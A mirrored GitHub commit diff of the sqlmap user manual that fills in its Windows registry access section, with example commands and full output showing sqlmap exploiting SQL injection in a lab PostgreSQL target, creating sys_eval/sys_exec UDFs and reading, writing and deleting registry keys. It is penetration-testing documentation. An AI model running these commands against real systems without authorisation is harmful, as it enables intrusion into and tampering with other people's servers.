mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 11:03:47 +03:00
Generated new user's manual html and pdf
This commit is contained in:
parent
ee89709042
commit
bfbf58b04e
165
doc/README.html
165
doc/README.html
|
@ -5345,54 +5345,163 @@ meterpreter > exit
|
||||||
<H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">Windows registry access</A>
|
<H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">Windows registry access</A>
|
||||||
</H2>
|
</H2>
|
||||||
|
|
||||||
|
<P>It is possible to access Windows registry when the back-end
|
||||||
|
database management system is either MySQL, PostgreSQL or
|
||||||
|
Microsoft SQL Server, and when the underlying database layer
|
||||||
|
supports stacked SQL queries. Also, session user has to have
|
||||||
|
the needed privileges to access it.</P>
|
||||||
|
|
||||||
<H3>Read a Windows registry key value</H3>
|
<H3>Read a Windows registry key value</H3>
|
||||||
|
|
||||||
<P>Option: <CODE>-</CODE><CODE>-reg-read</CODE></P>
|
<P>Option: <CODE>-</CODE><CODE>-reg-read</CODE></P>
|
||||||
|
|
||||||
<P>TODO</P>
|
<P>Using this option you can read registry key values.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-read
|
||||||
|
|
||||||
<H3>Write a Windows registry key value data</H3>
|
[...]
|
||||||
|
web server operating system: Windows
|
||||||
|
web application technology: PHP 5.3.1, Apache 2.2.14
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:15] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[hh:mm:15] [INFO] retrieved: 8.4.2,
|
||||||
|
[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[hh:mm:23] [INFO] retrieved: 1
|
||||||
|
[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
[hh:mm:23] [INFO] testing if current user is DBA
|
||||||
|
[hh:mm:23] [INFO] retrieved: 1
|
||||||
|
[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist
|
||||||
|
[hh:mm:23] [INFO] retrieved: 0
|
||||||
|
[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist
|
||||||
|
[hh:mm:24] [INFO] retrieved: 0
|
||||||
|
[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file
|
||||||
|
[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file
|
||||||
|
which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
|
||||||
|
CurrentVersion]
|
||||||
|
which registry key value do you want to read? [ProductName]
|
||||||
|
[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
|
||||||
|
Windows NT\CurrentVersion\ProductName'
|
||||||
|
[hh:mm:35] [INFO] retrieved: ProductName REG_SZ Microsoft Windows XP
|
||||||
|
Registry key value data: 'ProductName REG_SZ Microsoft Windows XP'
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
<H3>Write a Windows registry key value</H3>
|
||||||
|
|
||||||
<P>Option: <CODE>-</CODE><CODE>-reg-add</CODE></P>
|
<P>Option: <CODE>-</CODE><CODE>-reg-add</CODE></P>
|
||||||
|
|
||||||
<P>TODO</P>
|
<P>Using this option you can write registry key values.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add
|
||||||
|
|
||||||
<H3>Delete a Windows registry key value</H3>
|
[...]
|
||||||
|
web server operating system: Windows
|
||||||
|
web application technology: PHP 5.3.1, Apache 2.2.14
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[hh:mm:20] [INFO] retrieved: 8.4.2,
|
||||||
|
[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[hh:mm:29] [INFO] retrieved: 1
|
||||||
|
[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
[hh:mm:30] [INFO] testing if current user is DBA
|
||||||
|
[hh:mm:30] [INFO] retrieved: 1
|
||||||
|
[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
|
||||||
|
[hh:mm:30] [INFO] retrieved: 0
|
||||||
|
[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
|
||||||
|
which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
|
||||||
|
which registry key value do you want to write? Test
|
||||||
|
which registry key value data do you want to write? 1
|
||||||
|
which registry key value data-type is it? [REG_SZ] REG_DWORD
|
||||||
|
[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'
|
||||||
|
with data '1'. This will work only if the user running the database process has privileges
|
||||||
|
to modify the Windows registry.
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
<H3>Delete a Windows registry key</H3>
|
||||||
|
|
||||||
<P>Option: <CODE>-</CODE><CODE>-reg-del</CODE></P>
|
<P>Option: <CODE>-</CODE><CODE>-reg-del</CODE></P>
|
||||||
|
|
||||||
<P>TODO</P>
|
<P>Using this option you can delete registry keys.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-del
|
||||||
|
|
||||||
|
[...]
|
||||||
|
web server operating system: Windows
|
||||||
|
web application technology: PHP 5.3.1, Apache 2.2.14
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[hh:mm:20] [INFO] retrieved: 8.4.2,
|
||||||
|
[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[hh:mm:29] [INFO] retrieved: 1
|
||||||
|
[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
[hh:mm:30] [INFO] testing if current user is DBA
|
||||||
|
[hh:mm:30] [INFO] retrieved: 1
|
||||||
|
[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
|
||||||
|
[hh:mm:30] [INFO] retrieved: 0
|
||||||
|
[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
|
||||||
|
which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
|
||||||
|
which registry key value do you want to delete? Test
|
||||||
|
are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\
|
||||||
|
sqlmap\Test? [y/N] y
|
||||||
|
[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'.
|
||||||
|
This will work only if the user running the database process has privileges to modify the
|
||||||
|
Windows registry.
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Windows registry key</H3>
|
<H3>Auxiliary registry switches</H3>
|
||||||
|
|
||||||
<P>Option: <CODE>-</CODE><CODE>-reg-key</CODE></P>
|
<P>Options: <CODE>-</CODE><CODE>-reg-key</CODE>, <CODE>-</CODE><CODE>-reg-value</CODE>,
|
||||||
|
<CODE>-</CODE><CODE>-reg-data</CODE> and <CODE>-</CODE><CODE>-reg-type</CODE></P>
|
||||||
|
|
||||||
<P>TODO</P>
|
<P>These switches can be used to provide data needed for proper running of
|
||||||
|
options <CODE>-</CODE><CODE>-reg-read</CODE>, <CODE>-</CODE><CODE>-reg-add</CODE> and
|
||||||
|
<CODE>-</CODE><CODE>-reg-del</CODE>. So, instead of providing registry key
|
||||||
|
information when asked, you can use them at command prompt as program
|
||||||
|
arguments.</P>
|
||||||
|
|
||||||
|
<P>With <CODE>-</CODE><CODE>-reg-key</CODE> option you specify used windows
|
||||||
|
registry key path, with <CODE>-</CODE><CODE>-reg-value</CODE> value item
|
||||||
|
name inside provided key, with <CODE>-</CODE><CODE>-reg-data</CODE> value
|
||||||
|
data, while with <CODE>-</CODE><CODE>-reg-type</CODE> option you specify
|
||||||
|
type of the value item.</P>
|
||||||
|
|
||||||
<H3>Windows registry key value</H3>
|
<P>So, another way of running example from option
|
||||||
|
<CODE>-</CODE><CODE>-reg-add</CODE> could be:</P>
|
||||||
<P>Option: <CODE>-</CODE><CODE>-reg-value</CODE></P>
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
<P>TODO</P>
|
<PRE>
|
||||||
|
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \
|
||||||
|
--reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1
|
||||||
<H3>Windows registry key value data</H3>
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
<P>Option: <CODE>-</CODE><CODE>-reg-data</CODE></P>
|
</P>
|
||||||
|
|
||||||
<P>TODO</P>
|
|
||||||
|
|
||||||
|
|
||||||
<H3>Windows registry key value type</H3>
|
|
||||||
|
|
||||||
<P>Option: <CODE>-</CODE><CODE>-reg-type</CODE></P>
|
|
||||||
|
|
||||||
<P>TODO</P>
|
|
||||||
|
|
||||||
|
|
||||||
<H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">Miscellaneous</A>
|
<H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">Miscellaneous</A>
|
||||||
</H2>
|
</H2>
|
||||||
|
|
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
Loading…
Reference in New Issue
Block a user